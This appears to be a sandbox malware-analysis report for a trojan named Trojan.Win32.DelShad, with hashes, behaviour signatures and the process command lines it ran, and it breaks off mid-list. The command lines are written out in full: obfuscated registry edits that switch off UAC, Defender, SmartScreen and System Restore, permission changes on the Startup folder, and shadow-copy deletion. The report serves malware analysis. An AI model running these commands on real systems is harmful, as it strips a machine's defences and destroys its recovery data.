| SHA1 | 2bbfb064f6faa8953e75f90f278a5d41d9b7684f |
| SHA256 | 5f37d596e9d27a2546df161307dcd9f9d4243236c148f54d105291e4b9023d22 |
| SHA512 | 44f0468b7d892ca707972c27612d3f25465746c4a3a352b20f68e273577e438857fd62f908cd24fa2c0c8050e554fe5cd99a1b8d25586bc975c3320c2dea02e3 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 80fd345f8b4645540981b11c722f1059 |
| SHA1 | 5b8a1c96ae8dbbe1d609e863686eef2b7beb7344 |
| SHA256 | f1ad768f9bb73636fb8299bb07761047f68ed8dcc12e2f60f21cada66bc91521 |
| SHA512 | bee9504f71ed9636cf9fe158e9ee41ec23039e8c86c053d9c0d3b8ec0bce19eb36e30706251efd86561fa021be85cff9c78c7836e7868df6f160268a601b7cc7 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 8c4a3e1a4e72d8674b051a850a3ed938 |
| SHA1 | c2dd76a0e9410647df1a48ef4520d09ee6cbfd57 |
| SHA256 | 736a3c8377d5eef47a1118eec17c4028fe2c728037d466647a900c8426bbb587 |
| SHA512 | 86753980d57748000b6e7660df7fc95cee8ef61e8b0986a30287a03976cf5fd0a75c1fe50cd7d444d046df72f7df6f31c4ae85f862b7509368ad2e5319b8d541 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 4d21908dc10761543db6275f5f319944 |
| SHA1 | 761e7ffec616e8bf42fe491e284f2bef677a26fd |
| SHA256 | 5591db5b4c6fb98ce48007298d5f46ea2a72fcc95a0847212ab9f6266edb9f14 |
| SHA512 | d14a9ae9441ba8056a992c474ed6335b30550fa2c34ab2c2cf52532f8d31e64a67a3996808fb519c48dbf9c4624d5551e7ff7fa7378ea30629edaaafb55cb8a9 |
memory/2820-500-0x0000000000400000-0x00000000004E3000-memory.dmp
\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/2760-505-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2760-506-0x00000000039A0000-0x0000000003C48000-memory.dmp
memory/980-508-0x0000000000400000-0x00000000006A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
memory/980-511-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/2760-516-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2820-518-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/980-519-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1312-531-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-535-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-539-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-543-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e775f2973a362cfde5005d66e42bd39d |
| SHA1 | 1a0303ceed6ede89b3e3c27beae948cdd397ef94 |
| SHA256 | 5ff0dce7768f46dce91af724cdbbc885761db1c8922f3e95fa36d6fbdcf142fb |
| SHA512 | 175dbd541c3e084e5d34762f884d6759eaca721b05308fc9d51b457863ff5b199b2f6efb0183ea7ec18af504b3310a95d1893075f1b57a9ea7a46ee1792ae0e3 |
memory/1312-553-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-533-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-537-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-555-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/980-557-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1312-556-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-554-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-552-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-550-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-549-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1312-545-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1312-541-0x0000000000400000-0x0000000000AE1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
140s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2516 set thread context of 1500 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp" /SL5="$70050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp" /SL5="$80050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
